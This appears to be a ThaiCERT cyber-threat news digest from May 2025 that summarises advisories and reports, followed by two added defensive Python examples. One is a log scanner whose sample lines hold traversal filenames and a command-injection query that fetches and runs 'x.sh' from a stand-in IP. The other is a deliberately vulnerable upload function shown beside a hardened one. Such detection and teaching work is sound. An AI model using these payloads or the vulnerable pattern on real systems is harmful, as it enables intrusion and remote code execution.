NCSA Webboard

    Cyber Threat Intelligence 07 May 2025

    Cyber Security News
    • Posted by NCSA_THAICERT

      Financial Sector

      • The Top Threat Actor Groups Targeting The Financial Sector
        "Between April 2024 and April 2025, Flashpoint analysts observed the financial sector as a top target of threat actors, with 406 publicly disclosed victims falling prey to ransomware attacks alone—representing seven percent of all ransomware victim listings during that period. However, ransomware is just one piece of the complex threat actor puzzle. The financial sector is also grappling with threats stemming from sophisticated Advanced Persistent Threat (APT) groups, the risks associated with third-party compromises, the illicit trade in initial access credentials, the ever-present danger of insider threats, and the emerging challenge of deepfake and impersonation fraud."
        https://flashpoint.io/blog/top-threat-actor-groups-targeting-financial-sector/

      Industrial Sector

      • Optigo Networks ONS NC600
        "Successful exploitation of this vulnerability could allow an attacker to establish an authenticated connection with the hard-coded credentials and perform OS command executions."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-126-01
      • BrightSign Players
        "Successful exploitation of this vulnerability could allow for privilege escalation on the device, easily guessed passwords, or for arbitrary code to be executed on the underlying operating system."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-126-03
      • Milesight UG65-868M-EA
        "Successful exploitation of this vulnerability could allow any user with admin privileges to inject arbitrary shell commands."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-126-02

      Vulnerabilities

      • Canary Exploit Tool For CVE-2025-30065 Apache Parquet Avro Vulnerability
        "On April 1st, 2025, CVE-2025-30065 was published, although rumors had been swirling on various platforms for several days before about a very high severity security issue with Apache Parquet, leading to much consternation within the IT community. F5 began receiving calls from worried customers asking questions about this vulnerability in their own systems as early as March 29th, three days before it was publicly disclosed. At this time very little was known about the issue, only that it was possibly very serious. As it turned out, CVE-2025-30065 was issued as a CVSS 10.0 (Critical) vulnerability in Apache Parquet Java. Patches were immediately issued, customers were able to assess their exposure, and the attention seen previously began to wane."
        https://www.f5.com/labs/articles/threat-intelligence/canary-exploit-tool-for-cve-2025-30065-apache-parquet-avro-vulnerability
        https://www.bleepingcomputer.com/news/security/apache-parquet-exploit-tool-detect-servers-vulnerable-to-critical-flaw/

      Malware

      • Smishing On a Massive Scale: "Panda Shop" Chinese Carding Syndicate
        "Resecurity was the first company to identify the Smishing Triad, a group of Chinese cybercriminals targeting consumers across the globe. In August 2023, our team was able to identify their activity and locate the smishing kit they were using, successfully exploiting a vulnerability, which exposed the threat actors and their infrastructure. Since then, the group has become stealthier and upgraded its tooling, tactics, and procedures (TTPs). A group of this scale is not limited to just one threat actor; it has numerous associates with different roles, blurring its public profile. Such groups leverage a "Crime-as-a-Service" model, enabling other cybercriminals to use their smishing kit and scale their operations targeting consumers in different countries."
        https://www.resecurity.com/blog/article/smishing-massive-scale-panda-shop-chinese-carding-syndicate
        https://securityaffairs.com/177502/cyber-crime/smishing-on-a-massive-scale-panda-shop-chinese-carding-syndicate.html
        https://www.infosecurity-magazine.com/news/smishing-triad-upgrades-tools/
      • Arctic Wolf Observes Exploitation Of Path Traversal Vulnerability In Samsung MagicINFO 9 Server (CVE-2024-7399)
        "As of early May 2025, Arctic Wolf has observed exploitation in the wild of CVE-2024-7399 in Samsung MagicINFO 9 Server—a content management system (CMS) used to manage and remotely control digital signage displays. The vulnerability allows for arbitrary file writing by unauthenticated users, and may ultimately lead to remote code execution when the vulnerability is used to write specially crafted JavaServer Pages (JSP) files. This high-severity vulnerability had originally been made public by Samsung in August 2024 following responsible disclosure by security researchers, with no exploitation reported at the time. On April 30, 2025, a new research article was published along with technical details and a proof-of-concept (PoC) exploit. Exploitation was then observed within days of that publication."
        https://arcticwolf.com/resources/blog/cve-2024-7399/
        https://www.bleepingcomputer.com/news/security/samsung-magicinfo-9-server-rce-flaw-now-exploited-in-attacks/
        https://www.securityweek.com/samsung-magicinfo-vulnerability-exploited-days-after-poc-publication/
        https://www.helpnetsecurity.com/2025/05/06/exploited-vulnerability-software-managing-samsung-digital-displays-cve-2024-7399/
        https://securityaffairs.com/177529/hacking/samsung-magicinfo-vulnerability-exploited-after-poc-publication.html
      • Defending Against UNC3944: Cybercrime Hardening Guidance From The Frontlines
        "UNC3944, which overlaps with public reporting on Scattered Spider, is a financially-motivated threat actor characterized by its persistent use of social engineering and brazen communications with victims. In early operations, UNC3944 largely targeted telecommunications-related organizations to support SIM swap operations. However, after shifting to ransomware and data theft extortion in early 2023, they impacted organizations in a broader range of industries. Since then, we have regularly observed UNC3944 conduct waves of targeting against a specific sector, such as financial services organizations in late 2023 and food services in May 2024. Notably, UNC3944 has also previously targeted prominent brands, possibly in an attempt to gain prestige and increased attention by news media."
        https://cloud.google.com/blog/topics/threat-intelligence/unc3944-proactive-hardening-recommendations
        https://www.bankinfosecurity.com/retail-sector-in-scattered-spider-crosshairs-a-28316
        https://www.infosecurity-magazine.com/news/dragonforce-goup-ms-coop-harrods/
      • DragonForce Ransomware: Redefining Hybrid Extortion In 2025
        "The ransomware world isn’t just evolving—it’s fragmenting, decentralizing, and growing more dangerous. In this volatile landscape, DragonForce is emerging as one of the most intriguing and threatening actors of 2025. Born from possible hacktivist roots and now fully immersed in the economics of cyber crime, DragonForce represents a new era of hybrid threats: ideologically ambiguous, technologically agile, and fiercely opportunistic."
        https://blog.checkpoint.com/security/dragonforce-ransomware-redefining-hybrid-extortion-in-2025/
      • Microsoft Dynamics 365 Customer Voice Phishing Scam
        "Check Point researchers have identified a new phishing campaign that exploits Microsoft’s “Dynamics 365 Customer Voice,” a customer relationship management software product. It’s often used to record customer calls, monitor customer reviews, share surveys and track feedback. Microsoft 365 is used by over 2 million organizations worldwide. At least 500,000 organizations use Dynamics 365 Customer Voice, including 97% of Fortune 500 companies."
        https://blog.checkpoint.com/research/microsoft-dynamics-365-customer-voice-phishing-scam/
      • CoGUI Phish Kit Targets Japan With Millions Of Messages
        "Proofpoint has observed a notable increase in high-volume Japanese language campaigns targeting organizations in Japan to deliver a phishing kit that Proofpoint researchers refer to as CoGUI. Most of the observed campaigns abuse popular consumer or payment brands in phishing lures, including Amazon, PayPay, Rakuten, and others. The CoGUI phishing kit is a highly evasive phishing framework identified by Proofpoint researchers, primarily targeting users in Japan. Several campaigns were observed targeting users in Australia, New Zealand, Canada and the United States, but these occurred much less frequently than in Japan."
        https://www.proofpoint.com/us/blog/threat-insight/cogui-phish-kit-targets-japan-millions-messages
      • Second Wave Of Attacks Hitting SAP NetWeaver After Zero-Day Compromise
        "Threat actors have been observed launching a second wave of attacks against SAP NetWeaver instances that were compromised via a recent zero-day vulnerability, enterprise application security firm Onapsis warns. The zero-day, tracked as CVE-2025-31324 (CVSS score of 10/10), was disclosed on April 24, after SAP updated its April 2025 Security Patch Day bulletin to add a fresh note addressing it. In-the-wild exploitation of the bug was observed by cybersecurity firm ReliaQuest on systems that had the latest patches installed and was associated with initial access brokers. According to Mandiant, the flaw had been exploited since at least mid-March 2025."
        https://www.securityweek.com/second-wave-of-attacks-hitting-sap-netweaver-after-zero-day-compromise/
        https://securityaffairs.com/177522/hacking/experts-warn-of-a-second-wave-of-attacks-targeting-sap-netweaver-bug-cve-2025-31324.html
      • Here Comes Mirai: IoT Devices RSVP To Active Exploitation
        "Endpoints have been forcibly saying “I do” to Mirai since 2016, and some retired GeoVision devices are among the latest “proposals.” In early April 2025, the Akamai SIRT discovered activity targeting the URI /DateSetting.cgi in our global network of honeypots. After further investigation, we were able to attribute this activity to command injection vulnerabilities (CVE-2024-6047 and CVE-2024-11120) that were previously disclosed in GeoVision devices. Despite being “known” vulnerabilities, there was little more than the assigned CVE numbers actually known about them, at least publicly. Attribution — along with the scope of the threat, which is limited to retired GeoVision IoT devices — was ultimately validated directly by the vendor."
        https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet
        https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html
      • Uncovering Actor TTP Patterns And The Role Of DNS In Investment Scams
        "According to the Federal Trade Commission (FTC), consumers lost more money to investment scams than any other kind in 2024. This equates to a 24 percent increase from 2023 to 2024 in the amount of money lost—a total of US$5.7 billion. These threats take a variety of forms, including the so-called pig butchering scams, which generally start with generic text messages to ones advertised through social media. Sometimes human interaction is involved and sometimes it is not. We track several investment scam actors and we’ve previously published research on two of them, Savvy Seahorse and Horrid Hawk, who have distinctive DNS fingerprints."
        https://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/
        https://thehackernews.com/2025/05/new-investment-scams-use-facebook-ads.html
      • Lampion Is Back With ClickFix Lures
        "Unit 42 researchers recently uncovered a highly focused malicious campaign targeting dozens of Portuguese organizations, particularly in the government, finance and transportation sectors. This campaign was orchestrated by the threat actors behind Lampion malware, an infostealer that focuses on sensitive banking information. This malware family has been active since at least 2019. During our investigation, we found that the group has added ClickFix lures to their arsenal. ClickFix is a social engineering technique that multiple malware families have adopted since late 2024, which lures victims to copy and execute malicious commands on their machine, under the guise of fixing computer problems."
        https://unit42.paloaltonetworks.com/lampion-malware-clickfix-lures/

      Breaches/Hacks/Leaks

      • UK Legal Aid Agency Investigates Cybersecurity Incident
        "The Legal Aid Agency (LAA), an executive agency of the UK's Ministry of Justice that oversees billions in legal funding, warned law firms of a security incident and said the attackers might have accessed financial information. Approximately 2,000 providers, including barristers, solicitor firms, and non-profit organizations, deliver civil and criminal legal aid services in England and Wales under contracts with the LAA. The agency employs around 1,250 staff and runs the country's Public Defender Service. In a letter sent to law firms, the agency said it cannot confirm if any data was accessed. Still, it acknowledged the risk that legal aid providers' payment information might have been compromised, as Sky News first reported."
        https://www.bleepingcomputer.com/news/security/uk-legal-aid-agency-investigates-cybersecurity-incident/
      • “Your Privacy Is a Promise We Don’t Break”: Dating App Raw Exposes Sensitive User Data
        "Any app that hands over user data is a concern, but leaky dating apps are especially worrying given the sensitivity of the data involved. A relatively new app called Raw that aims to rewrite the rules of dating is the latest to trip over its coattails by exposing user data to…well, anyone who asked for it. Launched in 2023, Raw is a dating app that aims to solve some of the traditional problems in online dating, including fake or egregiously touched-up photos, and ghosting (where one person goes silent on each other). The company’s app shares user locations and asks them to post daily photos of themselves to create a more authentic matching experience."
        https://www.malwarebytes.com/blog/news/2025/05/your-privacy-is-a-promise-we-dont-break-dating-app-raw-exposes-sensitive-user-data
      • Multiple iHeartRadio Stations Breached In December
        "Several radio stations owned by iHeartMedia were breached in December, exposing Social Security numbers, financial information and other personal details. The media conglomerate filed breach notices in several states but declined to say how many people were impacted or how many stations were attacked when reached for comment."
        https://therecord.media/iheart-radio-stations-breached-december
      • Texas School District Notifies Over 47,000 People Of Major Data Breach
        "A data breach affecting Alvin Independent School District (AISD) in Texas has compromised sensitive personal information belonging to 47,606 individuals. The district confirmed the breach, which occurred in June 2024, and began notifying impacted people over the weekend. Exposed information includes names, Social Security numbers, state-issued IDs, credit and debit card details, financial account numbers, medical data and health insurance information. The incident was reported by the Texas attorney general on May 2 2025."
        https://www.infosecurity-magazine.com/news/texas-school-47000-people-data/

      General News

      • What It Really Takes To Build a Resilient Cyber Program
        "In this Help Net Security interview, Dylan Owen, CISO at Nightwing, talks about what it really takes to build an effective defense: choosing the right frameworks, setting up processes, and getting everyone on the same page. Drawing on both military and private sector experience, Owen explains how preparation, communication, and constant adjustment are key to building a more proactive security approach."
        https://www.helpnetsecurity.com/2025/05/06/dylan-owen-nightwing-cyber-defense-strategy/
      • How Cybercriminals Exploit Psychological Triggers In Social Engineering Attacks
        "Most attacks don’t start with malware; they begin with a message that seems completely normal, whether it comes through email, a phone call, or a chat, and that is exactly what makes them so effective. These threats rely on psychological manipulation to bypass people, not firewalls. Pressure is applied, authority is faked, and communication is mimicked. Social engineering threats account for most cyberthreats faced by individuals in 2024, according to Avast."
        https://www.helpnetsecurity.com/2025/05/06/social-engineering-human-behavior/
      • As Vishing Gains Momentum, It’s Time To Fight Back
        "The mechanisms and dangers of email phishing are well known, as are the best practices for hardening organizations against it. Its spin-off, called vishing, is nothing new, but it’s both rapidly evolving, and unlike the more mainstream counterpart, too often overlooked by security professionals. According to the CrowdStrike 2025 Global Threat Report, these offbeat attacks saw a 442% increase in the second half of 2024 compared to the first half of the year. This dramatic spike should be interpreted as a call to action in terms of countermeasures, especially in enterprise environments."
        https://www.tripwire.com/state-of-security/vishing-gains-momentum-its-time-fight-back
      • Ransomware Attacks April 2025: Qilin Emerges From Chaos
        "Global ransomware attacks in April 2025 declined to 450 from 564 in March – the lowest level since November 2024 – as major changes among the leading Ransomware-as-a-Service (RaaS) groups caused many affiliates to align with new groups. Still, the long-term trend for ransomware attacks remains decidedly upward (chart below) so April’s decline could be reversed as soon as new RaaS leaders are established."
        https://cyble.com/blog/qilin-tops-april-2025-ransomware-report/
      • Addressing The Top Cyber-Risks In Higher Education
        "As city-like microcosms, colleges and universities have become prime targets of cyberattacks. Their classrooms, student housing, athletics facilities and venues, retail locations, and, in some cases, public safety and clinical locations are all connected to the same network, creating a large and complex landscape for potential attacks."
        https://www.darkreading.com/vulnerabilities-threats/addressing-top-cyber-risks-higher-education
      • And The Cloud Goes Wild: Looking At Vulnerabilities In Cloud Assets
        "We admit it – we’ve had our heads in the clouds recently. Since we started working with Wiz as one of their integration partners, we’ve been spending even more time thinking about cloud assets. And these assets are everywhere! Gartner predicts double digit growth across all cloud segments in 2025. More and more organizations are adopting multi-cloud strategies that spread their assets across multiple hosting providers and more and more IT infrastructure spending is shifting from on-premise hosting to cloud."
        https://www.cycognito.com/blog/and-the-cloud-goes-wild-looking-at-vulnerabilities-in-cloud-assets/
        https://hackread.com/cloud-vulnerability-data-google-cloud-leads-risk/
      • What a Future Without CVEs Means For Cyber Defense
        "The importance of the MITRE-run Common Vulnerabilities and Exposures (CVE) Program shouldn’t be understated. For 25 years, it has acted as the point of reference for cybersecurity professionals to understand and mitigate security flaws. By providing a standardized method for naming and cataloguing known vulnerabilities, it offers defenders a shared language for understanding, prioritizing, and responding to real-world threats. The program has traditionally relied on US government funding to sustain operations and, unfortunately, equivalent databases that operate on the same scale aren’t readily available. Thus, the decision from the US government to row back its guardianship of the program has been met with industry surprise and concern."
        https://www.helpnetsecurity.com/2025/05/06/cve-program-foundation/
      • Applying The OODA Loop To Solve The Shadow AI Problem
        "With AI introducing efficiency, automation, and reduced operational costs, organizations are embracing AI tools and technology with open arms. At the user level, more employees resort to personal AI tools to save time, work smarter, and increase productivity. According to a study in October 2024, seventy-five percent of knowledge workers currently use AI, with 46% stating they would not relinquish it even if their organization did not approve of its use. Organizations are confronting the challenge of shadow AI, as employees utilize unauthorized AI tools without company consent, leading to risks related to data exposure, compliance, and operations."
        https://www.securityweek.com/applying-the-ooda-loop-to-solve-the-shadow-ai-problem/
      • Hacker Conversations: John Kindervag, a Making Not Breaking Hacker
        "Kindervag is a hacker – sort of. But he is not the sort of hacker we have come to expect. John Kindervag is best known for developing the Zero Trust Model in 2009 while he was a principal analyst at Forrester Research. In essence, zero trust is based on the principle of ‘never trust, always verify’. He is currently, since September 2023, Chief Evangelist at Illumio, where he is tasked with “driving the adoption of Zero Trust Segmentation through high-touch advocacy and forward-thinking thought leadership”. He is not the typical hacker in today’s terminology."
        https://www.securityweek.com/hacker-conversations-john-kindervag-a-making-not-breaking-hacker/
      • Entra ID Data Protection: Essential Or Overkill?
        "Microsoft Entra ID (formerly Azure Active Directory) is the backbone of modern identity management, enabling secure access to the applications, data, and services your business relies on. As hybrid work and cloud adoption accelerate, Entra ID plays an even more central role — managing authentication, enforcing policy, and connecting users across distributed environments. That prominence also makes it a prime target. Microsoft reports over 600 million attacks on Entra ID every day. These aren't just random attempts, but include coordinated, persistent, and increasingly automated campaigns designed to exploit even small vulnerabilities."
        https://thehackernews.com/2025/05/entra-id-data-protectionessential-or.html

      Reference: Electronic Transactions Development Agency (ETDA)
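      Two of the items above (Samsung MagicINFO 9 Server, CVE-2024-7399, and the Mirai activity against /DateSetting.cgi on retired GeoVision devices) describe exploitation that leaves a recognisable trace in web-server access logs: a path-traversal sequence carrying a server-executable filename, and a request to the watched CGI URI whose query contains shell metacharacters. The script below is an added example, not code from any of the linked reports or vendors. The log lines are constructed; the /upload endpoint, the fileName parameter, the IP addresses and the payloads are assumptions made for illustration, and only the /DateSetting.cgi URI comes from the Akamai write-up. It decodes each request target repeatedly so double-encoded traversal is not missed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). These are NOT real
# traffic from the reports above: the /upload endpoint, parameter names, IPs and
# payloads are made up for illustration. Only /DateSetting.cgi is taken from the
# Akamai write-up.
SAMPLE_LOG = """\
198.51.100.7 - - [05/May/2025:10:14:02 +0000] "GET /upload?fileName=report.pdf HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.7 - - [05/May/2025:10:14:05 +0000] "POST /upload?fileName=..%2F..%2FROOT%2Fshell.jsp HTTP/1.1" 200 12 "-" "python-requests/2.31"
198.51.100.7 - - [05/May/2025:10:14:09 +0000] "POST /upload?fileName=%252e%252e%252f%252e%252e%252fROOT%252fcmd.jsp HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.44 - - [05/May/2025:10:15:11 +0000] "GET /DateSetting.cgi?tz=GMT+8 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.44 - - [05/May/2025:10:15:12 +0000] "GET /DateSetting.cgi?tz=GMT%3Bwget%20http%3A%2F%2F203.0.113.9%2Fx.sh%3Bsh%20x.sh HTTP/1.1" 200 24 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')            # "../" or "..\" after decoding
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(')        # separators that end a shell command
SERVER_EXEC_EXT = ('.jsp', '.jspx', '.war')        # assumption: Java web container
WATCHED_CGI = '/DateSetting.cgi'                   # URI Akamai saw targeted on GeoVision devices


def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e -> %2e -> .) is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(target):
    """Return the list of reasons a request target looks like exploitation, or []."""
    decoded = fully_decode(target)
    path, _, query = decoded.partition('?')
    values = [kv.partition('=')[2] for kv in query.split('&')] if query else []
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append('path traversal sequence')
    if any(v.lower().endswith(SERVER_EXEC_EXT) for v in values):
        reasons.append('server-executable file extension')
    if path == WATCHED_CGI:
        reasons.append('request to ' + WATCHED_CGI)
        if SHELL_META_RE.search(query):
            reasons.append('shell metacharacters in query')
    return reasons


def analyze(log_text):
    """Scan log text; return one finding dict per suspicious line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue            # not a request line we understand; skip it
        reasons = classify(m['target'])
        if reasons:
            findings.append({'line': lineno, 'src': m['src'],
                             'target': m['target'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG):
        print(f"line {f['line']} {f['src']} {f['target']}\n    {', '.join(f['reasons'])}")
```

      The benign first line produces no finding, lines 2 and 3 are flagged for both traversal and a .jsp target (the double-encoded one only because decoding is repeated), and a bare hit on /DateSetting.cgi is reported on its own so that any request to a URI reported under active exploitation is visible, with the metacharacter check raising the confidence on line 5. The extension check is applied to query values rather than the request path so that legitimate JSP pages on the server are not flagged.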
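      The MagicINFO item describes the bug class itself: a file-write handler that trusts a client-supplied name, so "../" walks out of the intended directory and a JSP dropped under a web application becomes code execution. The following is an added example, not code from Samsung or from any of the linked articles, showing the vulnerable join beside a hardened version. The directory names, the traversal filename and the blocked-extension list are assumptions (a Tomcat-style JSP container is assumed); the demo runs entirely inside a temporary directory.

```python
import os
import tempfile

# Extensions a Java web container would execute if they land under a web app.
# Assumption: the target is a Tomcat-style JSP server, as in the MagicINFO report.
BLOCKED_EXT = {'.jsp', '.jspx', '.war'}


def unsafe_save(root, filename, data):
    """Vulnerable pattern: the client-supplied name is joined straight under root.
    os.path.join keeps '..' segments, so '../ROOT/x.jsp' walks out of root."""
    dest = os.path.join(root, filename)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, 'wb') as fh:
        fh.write(data)
    return dest


def safe_save(root, filename, data):
    """Hardened version: strip directories, deny executable extensions,
    and verify the resolved path is still inside root before writing."""
    root_real = os.path.realpath(root)
    # Keep only the final path component; client-sent separators are ignored.
    base = os.path.basename(filename.replace('\\', '/'))
    if base in ('', '.', '..') or base.startswith('.'):
        raise ValueError('rejected filename: %r' % filename)
    if os.path.splitext(base)[1].lower() in BLOCKED_EXT:
        raise ValueError('rejected extension: %r' % base)
    dest = os.path.realpath(os.path.join(root_real, base))
    # Defence in depth: even after basename(), prove dest is under root.
    if os.path.commonpath([root_real, dest]) != root_real:
        raise ValueError('path escapes upload root: %r' % filename)
    with open(dest, 'xb') as fh:      # 'x' refuses to overwrite an existing file
        fh.write(data)
    return dest


def demo():
    """Run both versions against a traversal name in a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp_real = os.path.realpath(tmp)
        root = os.path.join(tmp, 'webapps', 'uploads')
        os.makedirs(root)
        root_real = os.path.realpath(root)
        evil = '../ROOT/shell.jsp'              # constructed traversal filename

        written = unsafe_save(root, evil, b'<%-- constructed --%>')
        escaped = os.path.commonpath([root_real, os.path.realpath(written)]) != root_real

        try:
            safe_save(root, evil, b'<%-- constructed --%>')
            rejected = False
        except ValueError:
            rejected = True

        # Traversal with an allowed extension is neutralised, not rejected.
        kept = safe_save(root, '../ROOT/index.html', b'<html></html>')
        ok = safe_save(root, 'report.pdf', b'%PDF-1.4')
        return {
            'unsafe_wrote': os.path.relpath(os.path.realpath(written), tmp_real),
            'unsafe_escaped': escaped,
            'safe_rejected': rejected,
            'neutralized_path': os.path.relpath(kept, root_real),
            'safe_path': os.path.relpath(ok, root_real),
        }


if __name__ == '__main__':
    for k, v in demo().items():
        print(f'{k}: {v}')
```

      unsafe_save writes webapps/ROOT/shell.jsp, one directory above the upload root, which is exactly the outcome the Arctic Wolf note describes. safe_save discards the directory part of the name, refuses container-executable extensions, and still re-checks the realpath against the root so that a later change to the name handling cannot silently reopen the hole; the 'x' open mode additionally stops an attacker from replacing an existing file.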
